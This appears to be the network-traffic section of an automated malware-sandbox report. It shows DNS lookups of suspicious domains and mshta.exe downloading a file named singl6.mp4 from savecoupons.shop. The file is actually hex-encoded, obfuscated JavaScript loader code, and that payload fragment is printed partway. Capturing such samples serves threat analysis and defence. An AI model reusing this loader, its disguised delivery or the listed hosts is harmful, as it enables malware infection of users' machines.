                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905395985 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905422926 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905451059 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905522108 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905833960 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:35.905896902 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.900232077 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.900329113 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.900547028 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.900547028 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.957770109 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.957802057 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.957969904 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.958165884 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:36.958178997 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.203814983 CET49773443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.203840971 CET44349773104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.227320910 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.227791071 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.228387117 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.228399992 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.228744984 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.229793072 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.229840040 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.229860067 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.733501911 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.733711004 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.733872890 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.733917952 CET49774443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:37.733926058 CET44349774104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.086240053 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.086261988 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.086421013 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.086596966 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.086606026 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.353420019 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.353631973 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.354512930 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.354537964 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.355031967 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.356903076 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358017921 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358047962 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358067036 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358114958 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358129025 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358160019 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358335018 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358419895 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358524084 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358620882 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358685970 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358706951 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.358911991 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359004974 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359294891 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359343052 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359484911 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359503984 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359656096 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359668970 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359874964 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.359894037 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360061884 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360076904 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360260963 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360290051 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360443115 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360461950 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360615969 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360627890 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360805988 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.360816956 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361025095 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361049891 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361188889 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361201048 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361409903 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361429930 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361593962 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361608982 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361767054 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361778021 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361963987 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.361983061 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362193108 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362234116 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362349987 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362370968 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362600088 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362633944 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362770081 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362785101 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362915993 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.362926960 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.363152981 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.363341093 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.363511086 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.363717079 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.363886118 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.364078045 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.364319086 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.364464045 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.364679098 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.364867926 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.365046024 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.365263939 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.365444899 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406270981 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406517029 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406543970 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406728983 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406759977 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406774998 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.406784058 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407026052 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407058954 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407190084 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407206059 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407363892 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407593012 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407772064 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.407927036 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.408165932 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.408345938 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.408508062 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.408732891 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.408906937 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:38.450222015 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.294775963 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.294960976 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.295348883 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.295348883 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.297076941 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.297127962 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.297422886 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.297527075 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.297558069 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.569226027 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.569447041 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.570245028 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.570275068 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.570849895 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.571914911 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.571914911 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.572086096 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.593247890 CET49775443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:42.593285084 CET44349775104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:50.415823936 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:50.415939093 CET44349776104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:50.416755915 CET49776443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:32.817714930 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:33.571974039 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:34.337466002 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:39.579760075 CET4916153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:39.712223053 CET53491611.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:44.246079922 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:45.004961014 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:45.770448923 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:46.909203053 CET5833553192.168.11.201.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.042167902 CET53583351.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.848186016 CET6449153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET53644911.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.081325054 CET53530771.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.313136101 CET615071900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.368727922 CET5828053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.368874073 CET5563453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.429388046 CET53615061.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.498414993 CET53582801.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.498426914 CET53556341.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:28.301515102 CET53544851.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:28.325139999 CET615071900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:29.326098919 CET615071900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:30.334889889 CET615071900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:31.031068087 CET53502501.1.1.1192.168.11.20
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:39.579760075 CET192.168.11.201.1.1.10xdd3aStandard query (0)savecoupons.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:46.909203053 CET192.168.11.201.1.1.10x2408Standard query (0)journal.liveview.pwA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.848186016 CET192.168.11.201.1.1.10x95aaStandard query (0)surmisehotte.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.368727922 CET192.168.11.201.1.1.10xf63Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.368874073 CET192.168.11.201.1.1.10x1b53Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:39.712223053 CET1.1.1.1192.168.11.200xdd3aNo error (0)savecoupons.shop172.67.223.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:39.712223053 CET1.1.1.1192.168.11.200xdd3aNo error (0)savecoupons.shop104.21.78.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.042167902 CET1.1.1.1192.168.11.200x2408No error (0)journal.liveview.pw104.21.37.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.042167902 CET1.1.1.1192.168.11.200x2408No error (0)journal.liveview.pw172.67.210.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.984019995 CET1.1.1.1192.168.11.200x95aaNo error (0)surmisehotte.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.498414993 CET1.1.1.1192.168.11.200xf63No error (0)www.google.com172.217.15.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:27.498426914 CET1.1.1.1192.168.11.200x1b53No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                      • savecoupons.shop
                                                                                                                                                                                                                                                      • journal.liveview.pw
                                                                                                                                                                                                                                                      • surmisehotte.click
                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.11.2049754172.67.223.74432044C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC331OUTGET /singl6.mp4 HTTP/1.1
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                      Host: savecoupons.shop
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:04:40 GMT
                                                                                                                                                                                                                                                      Content-Type: video/mp4
                                                                                                                                                                                                                                                      Content-Length: 642968
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      ETag: "543530c3b4038086637accf9d95397d6"
                                                                                                                                                                                                                                                      Last-Modified: Thu, 19 Dec 2024 17:35:49 GMT
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                      Age: 3647
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syYLRhMKGUmSGOJ1v8m1%2FdUpdhvp5BhMg8CKbquxcabu9PN%2BcW%2B1eNPRVPdEeUJ%2F0I%2BoqGm0vOOcO1AtEb19ab0t1QlPmqBW65Ivj7d9EAhCelZiT%2BHt9xMGEo5cmj5ahgfp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7b878ff2746a-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129611&min_rtt=129452&rtt_var=27554&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2865&recv_bytes=913&delivery_rate=29466&cwnd=243&unsent_bytes=0&cid=3ef69a0365f7a975&ts=325&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC423INData Raw: 36 36 44 37 35 56 36 65 64 36 33 53 37 34 54 36 39 42 36 66 4e 36 65 76 32 30 44 34 65 4f 35 37 6a 36 61 5a 34 65 4b 32 38 68 36 35 4c 34 66 7a 34 36 61 35 61 64 36 34 73 32 39 49 37 62 53 37 36 6e 36 31 72 37 32 6e 32 30 79 36 36 67 36 63 70 36 64 4d 34 66 70 33 64 79 32 30 74 32 37 79 32 37 41 33 62 65 36 36 66 36 66 73 37 32 42 32 30 53 32 38 53 37 36 4e 36 31 44 37 32 64 32 30 49 35 32 6c 35 39 76 34 63 6f 34 31 75 32 30 72 33 64 52 32 30 47 33 30 6f 33 62 53 35 32 6a 35 39 45 34 63 61 34 31 50 32 30 65 33 63 70 32 30 55 36 35 6d 34 66 4c 34 36 42 35 61 47 36 34 45 32 65 56 36 63 6b 36 35 5a 36 65 67 36 37 42 37 34 54 36 38 79 33 62 48 32 30 4b 35 32 65 35 39 45 34 63 70 34 31 66 32 62 46 32 62 73 32 39 4a 37 62 6c 37 36 78 36 31 75 37 32 69 32 30 4b
                                                                                                                                                                                                                                                      Data Ascii: 66D75V6ed63S74T69B6fN6ev20D4eO57j6aZ4eK28h65L4fz46a5ad64s29I7bS76n61r72n20y66g6cp6dM4fp3dy20t27y27A3be66f6fs72B20S28S76N61D72d20I52l59v4co41u20r3dR20G30o3bS52j59E4ca41P20e3cp20U65m4fL46B5aG64E2eV6ck65Z6eg67B74T68y3bH20K52e59E4cp41f2bF2bs29J7bl76x61u72i20K
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 36 63 4b 36 64 77 34 66 54 32 30 66 32 62 70 32 30 4f 34 37 6d 34 66 65 37 37 6d 36 32 75 34 64 79 37 33 49 37 64 56 37 32 6f 36 35 6e 37 34 6c 37 35 44 37 32 74 36 65 57 32 30 57 36 36 64 36 63 61 36 64 77 34 66 52 37 64 48 33 62 6a 37 36 50 36 31 53 37 32 64 32 30 47 36 36 4c 36 63 79 36 64 51 34 66 62 32 30 4c 33 64 67 32 30 4a 34 65 47 35 37 50 36 61 58 34 65 58 32 38 7a 35 62 72 33 34 48 33 39 55 33 35 54 32 63 54 33 34 73 33 39 47 33 34 6d 32 63 44 33 35 42 33 30 44 33 32 48 32 63 70 33 34 6a 33 38 7a 33 34 42 32 63 59 33 34 46 33 39 79 33 37 55 32 63 42 33 34 66 33 39 6a 33 38 41 32 63 73 33 34 75 33 38 64 33 37 48 32 63 63 33 34 78 33 38 65 33 34 79 32 63 79 33 34 64 33 39 6a 33 31 70 32 63 77 33 34 6f 33 39 51 33 31 58 32 63 4c 33 34 72 33 32 44
                                                                                                                                                                                                                                                      Data Ascii: 6cK6dw4fT20f2bp20O47m4fe77m62u4dy73I7dV72o65n74l75D72t6eW20W66d6ca6dw4fR7dH3bj76P61S72d20G66L6cy6dQ4fb20L3dg20J4eG57P6aX4eX28z5br34H39U35T2cT34s39G34m2cD35B30D32H2cp34j38z34B2cY34F39y37U2cB34f39j38A2cs34u38d37H2cc34x38e34y2cy34d39j31p2cw34o39Q31X2cL34r32D
